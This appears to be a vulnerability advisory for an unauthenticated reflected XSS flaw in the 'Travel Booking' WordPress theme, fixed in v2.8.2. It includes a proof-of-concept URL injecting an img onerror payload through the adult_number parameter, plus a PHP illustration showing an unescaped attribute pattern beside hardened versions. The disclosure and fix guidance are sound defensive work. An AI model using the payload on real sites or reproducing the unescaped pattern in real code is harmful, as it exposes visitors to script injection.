Travel Booking < 2.8.2 - Unauthenticated Reflected XSS



Description
An unauthenticated reflected XSS vulnerability was discovered in the «Travel Booking» WordPress theme; the tested version was v2.8.1.

Edit (WPScanTeam)
June 17th, 2020 - Confirmed & Escalated to Envato.
June 18th, 2020 - v2.8.2 released, fixing the issue.
Proof of Concept
https://example.com/search-hotel-full-map/?location_name=x&location_id=x&start=&end=&date=16/06/2020 12:00 am-17/06/2020 11:59 pm&room_num_search=x&adult_number="><img src='x' onerror=alert(`XSS`)>&child_number=0&price_range=x&taxonomy[hotel_facilities]=
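The leading `">` in the proof-of-concept payload above indicates that the `adult_number` value is reflected inside an HTML attribute without output escaping. The PHP below is an added, hypothetical illustration of that bug class beside its hardened form; it is not code from the Travel Booking theme, and the function names and exact reflection point are assumptions, while esc_attr(), absint() and wp_unslash() are standard WordPress functions.

```php
<?php
// Hypothetical illustration (not the theme's actual code) of a search
// parameter reflected into an HTML attribute, and two ways to harden it.

// Vulnerable pattern: the raw query value is concatenated into value="...".
// A value such as  "><img src='x' onerror=...>  closes the attribute and the
// tag, so the rest of the input is parsed as markup by the browser.
function render_adult_number_vulnerable( $value ) {
    return '<input type="text" name="adult_number" value="' . $value . '">';
}

// Hardened pattern: esc_attr() encodes quotes and angle brackets for the
// attribute context, so the payload is rendered as literal text.
function render_adult_number_fixed( $value ) {
    return '<input type="text" name="adult_number" value="' . esc_attr( $value ) . '">';
}

// Preferable when the field is numeric: validate the type instead of relying
// on escaping alone; absint() coerces the input to a non-negative integer.
function render_adult_number_validated( $value ) {
    return '<input type="number" name="adult_number" value="' . absint( $value ) . '">';
}

// Typical call site in a template: wp_unslash() removes the slashes WordPress
// adds to superglobals, then the value is escaped at the point of output.
$adult_number = isset( $_GET['adult_number'] ) ? wp_unslash( $_GET['adult_number'] ) : '';
echo render_adult_number_fixed( $adult_number );
```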

Affects Theme

Fixed in version 2.8.2

References

URL https://themeforest.net/item/traveler-traveltourbooking-wordpress-theme/10822683
URL https://travelerwp.com/traveler-changelog/

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher Vlad Vector
Submitter VLΛD VΞCTOR
Submitter Website https://vladvector.ru
Submitter Twitter vlad_vector
Verified Yes
WPVDB ID 10276

Timeline

Publicly Published 2020-06-19
Added 2020-06-19
Last Updated 2020-06-20
